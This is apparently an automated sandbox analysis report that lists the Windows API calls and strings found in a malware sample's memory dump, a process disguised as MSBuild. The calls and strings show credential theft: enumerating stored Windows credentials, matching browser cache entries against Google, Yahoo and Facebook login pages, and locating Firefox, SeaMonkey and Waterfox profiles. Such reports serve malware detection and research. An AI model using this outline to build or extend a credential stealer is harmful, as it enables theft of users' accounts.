                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 697348961-0
                                                                                                                                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                    • API String ID: 3527940856-11920434
                                                                                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                    • API String ID: 3527940856-2068335096
                                                                                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                    • API String ID: 3527940856-3369679110
                                                                                                                                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                    • API String ID: 3249829328-1174173950
                                                                                                                                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 669240632-0
                                                                                                                                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
